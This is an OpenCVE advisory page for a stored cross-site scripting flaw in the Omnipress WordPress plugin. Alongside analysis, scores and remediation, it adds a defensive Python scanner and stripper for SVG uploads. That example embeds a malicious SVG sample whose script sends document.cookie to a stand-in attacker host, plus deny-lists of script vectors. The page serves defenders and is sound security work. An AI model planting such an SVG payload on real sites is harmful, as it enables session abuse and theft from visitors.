Description
The Omnipress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
Published: 2025-12-05
Score: 6.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting via SVG uploads
Action: Patch
AI Analysis

Impact

The Omnipress plugin for WordPress lets authenticated users with Author-level access (or higher) upload SVG files. Because the plugin neither sanitizes the uploaded SVG markup nor escapes it on output, the file is stored and served exactly as submitted. SVG is an XML document that can carry <script> elements, on* event-handler attributes and javascript: links, so a crafted file executes in the browser of any user who opens it as a document (direct navigation to the file's URL, or embedding through <iframe>, <object> or <embed>; a plain <img> reference does not run scripts). Because the file is served from the site's own origin, this is the CWE-79 condition: the payload runs as arbitrary client-side code in the site's origin, can issue requests with the victim's session (WordPress sets its authentication cookies HttpOnly, so acting through the session is the usual payoff rather than reading the cookie), and can deface pages the victim views.

Affected Systems

All released versions of Omnipress up to and including 1.6.5 are affected; the record was first published against 1.6.3 and later widened to 1.6.5 (see History). The product is tracked as vendor omnipressteam, product omnipress. The flaw lies in the plugin's own file-upload handling, which accepts SVG content that WordPress core rejects by default. Administrators should treat every SVG uploaded through the plugin so far as untrusted and review or remove it.

Risk and Exploitability

The CVSS v3.1 base score of 6.4 (vector AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N) rates the vulnerability medium: reachable over the network, low attack complexity, low privileges required, and a scope change because the vulnerable component is the plugin while the impacted component is the victim's browser. The EPSS score is below 1%, the SSVC assessment records Exploitation: none and Automatable: no, and the CVE is not in the CISA KEV catalog. The bar to exploit is nonetheless low: any account holding the Author role suffices, and Author is a role sites routinely give to ordinary content writers. The attack path is an authenticated author uploading a crafted SVG through the plugin's upload feature and then getting a more privileged user (an editor or administrator) to open the file's URL; everything happens over the normal web interface, and because the SVG is served from the site's own origin the script runs with that origin's privileges.

Generated by OpenCVE AI on April 27, 2026 at 22:43 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update Omnipress to the latest release once a version later than 1.6.5 is published.
  • Until then, disable SVG uploads for the Author role (or for every role except administrator), since WordPress core does not permit SVG uploads on its own and the plugin is what enables them.
  • Review every SVG already present under wp-content/uploads, including files uploaded before any fix, and remove or replace any that contain <script> elements, on* event-handler attributes, javascript: links or SMIL animations that rewrite an href.
  • As a defence in depth, run SVGs through an allow-list sanitizer that strips disallowed elements and attributes before they are stored or served, or have the web server add a Content-Security-Policy: sandbox header to .svg responses so that a directly opened file cannot execute script in the site's origin.
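The following is an added example for this page, not Omnipress or OpenCVE code. It shows the three script vectors described in the Impact section, a triage scan over a wp-content/uploads tree for the review step recommended above, and a deny-list stripper for the sanitization step. The two SVG documents, the uploads layout, the host attacker.invalid and the function names are all constructed for the example; it assumes only that suspect files end in .svg. The stripper is deliberately a deny-list and is weaker than an allow-list sanitizer: it does not cover every vector (for example an xml-stylesheet processing instruction or url() loads inside <style>), so it illustrates the technique rather than replacing a maintained sanitizer.

```python
"""Triage and sanitize SVG files for the script vectors behind CVE-2025-12163-style stored XSS.

Added example for this page; it is not Omnipress or OpenCVE code. It assumes only that
suspect files end in .svg somewhere under a WordPress wp-content/uploads tree.
"""
import os
import re
import tempfile
import xml.etree.ElementTree as ET  # stdlib parser; for large untrusted trees prefer defusedxml

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Elements that execute or load active content when the SVG is opened as a document.
DANGEROUS_TAGS = {"script", "foreignObject", "iframe", "embed", "object"}
# SMIL animation can rewrite an href to javascript: after the static markup has been checked.
ANIMATION_TAGS = {"set", "animate"}
# Script URL schemes; browsers also accept leading whitespace and mixed case.
SCRIPT_URL = re.compile(r"^\s*(javascript|vbscript)\s*:", re.IGNORECASE)

# Constructed sample uploads (not files taken from any real site).
BENIGN_SVG = ('<svg xmlns="%s" viewBox="0 0 10 10">'
              '<circle cx="5" cy="5" r="4" fill="#09f"/></svg>' % SVG_NS)
MALICIOUS_SVG = """<?xml version="1.0"?>
<svg xmlns="%s" xmlns:xlink="%s" onload="alert(document.domain)">
  <a xlink:href="javascript:alert(1)"><text x="10" y="20">click</text></a>
  <script>fetch('https://attacker.invalid/?c=' + document.cookie)</script>
</svg>""" % (SVG_NS, XLINK_NS)


def _local(qname):
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return qname.split("}", 1)[1] if "}" in qname else qname


def _is_script_vector(el):
    """True if the element itself (regardless of its attributes) is a script vector."""
    name = _local(el.tag)
    if name in DANGEROUS_TAGS:
        return True
    return name in ANIMATION_TAGS and el.get("attributeName", "").lower() in ("href", "xlink:href")


def find_svg_findings(svg_text):
    """Return human-readable findings for one SVG document; an empty list means no vector seen."""
    findings = []
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return ["unparseable XML (%s); inspect manually" % exc]
    for el in root.iter():
        name = _local(el.tag)
        if _is_script_vector(el):
            findings.append("<%s> element" % name)
        for attr, value in el.attrib.items():
            a = _local(attr).lower()
            if a.startswith("on"):
                findings.append("%s= event handler on <%s>" % (a, name))
            elif a == "href" and SCRIPT_URL.match(value):
                findings.append("href=%r on <%s>" % (value.strip()[:40], name))
    return findings


def strip_script_vectors(svg_text):
    """Return the SVG with known script vectors removed (deny-list; allow-list sanitizers are stricter)."""
    root = ET.fromstring(svg_text)
    ET.register_namespace("", SVG_NS)
    ET.register_namespace("xlink", XLINK_NS)
    # ElementTree has no parent pointers, so build a map before deleting anything.
    parents = {child: parent for parent in root.iter() for child in parent}
    for el in list(root.iter()):
        if _is_script_vector(el) and el in parents:
            parents[el].remove(el)
            continue
        for attr in list(el.attrib):
            a = _local(attr).lower()
            if a.startswith("on") or (a == "href" and SCRIPT_URL.match(el.attrib[attr])):
                del el.attrib[attr]
    return ET.tostring(root, encoding="unicode")


def scan_uploads(uploads_dir):
    """Map each .svg path (relative to uploads_dir) to its findings; empty list means clean."""
    report = {}
    for dirpath, _, filenames in os.walk(uploads_dir):
        for fn in filenames:
            if fn.lower().endswith(".svg"):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as f:
                    report[os.path.relpath(path, uploads_dir)] = find_svg_findings(f.read())
    return report


def demo_scan():
    """Write the constructed samples into a temporary uploads tree and scan it."""
    with tempfile.TemporaryDirectory() as uploads:
        os.makedirs(os.path.join(uploads, "2025", "12"))
        with open(os.path.join(uploads, "logo.svg"), "w") as f:
            f.write(BENIGN_SVG)
        with open(os.path.join(uploads, "2025", "12", "evil.svg"), "w") as f:
            f.write(MALICIOUS_SVG)
        return scan_uploads(uploads)


if __name__ == "__main__":
    for path, findings in sorted(demo_scan().items()):
        print(path, "->", findings or "clean")
```

Point scan_uploads at a real wp-content/uploads directory to list every SVG with a finding; anything flagged should be removed or re-saved through strip_script_vectors (or, better, a maintained allow-list sanitizer) before it is served again.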

Advisories

No advisories yet.

History

Wed, 08 Apr 2026 17:30:00 +0000

Type: Weaknesses
  Values Removed: CWE-434
  Values Added: (none)

Wed, 08 Apr 2026 17:00:00 +0000

Type: Description
  Values Removed: The Omnipress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
  Values Added: The Omnipress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
Type: Title
  Values Removed: Omnipress <= 1.6.3 - Authenticated (Author+) Stored Cross-Site Scripting
  Values Added: Omnipress <= 1.6.5 - Authenticated (Author+) Stored Cross-Site Scripting
Type: Weaknesses
  Values Removed: (none)
  Values Added: CWE-79
Type: References

Fri, 05 Dec 2025 16:15:00 +0000

Type: Metrics
  Values Removed: (none)
  Values Added: ssvc
    {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 05 Dec 2025 11:00:00 +0000

Type: First Time appeared
  Values Removed: (none)
  Values Added: Omnipressteam; Omnipressteam omnipress; Wordpress; Wordpress wordpress
Type: Vendors & Products
  Values Removed: (none)
  Values Added: Omnipressteam; Omnipressteam omnipress; Wordpress; Wordpress wordpress

Fri, 05 Dec 2025 05:45:00 +0000

Type: Description
  Values Removed: (none)
  Values Added: The Omnipress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
Type: Title
  Values Removed: (none)
  Values Added: Omnipress <= 1.6.3 - Authenticated (Author+) Stored Cross-Site Scripting
Type: Weaknesses
  Values Removed: (none)
  Values Added: CWE-434
Type: References
Type: Metrics
  Values Removed: (none)
  Values Added: cvssV3_1
    {'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}


Subscriptions

Omnipressteam Omnipress
Wordpress Wordpress
MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T16:36:59.977Z

Reserved: 2025-10-24T14:04:10.223Z

Link: CVE-2025-12163

Vulnrichment

Updated: 2025-12-05T15:21:44.517Z

NVD

Status : Deferred

Published: 2025-12-05T06:16:06.053

Modified: 2026-04-15T00:35:42.020

Link: CVE-2025-12163

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-27T22:45:15Z

Weaknesses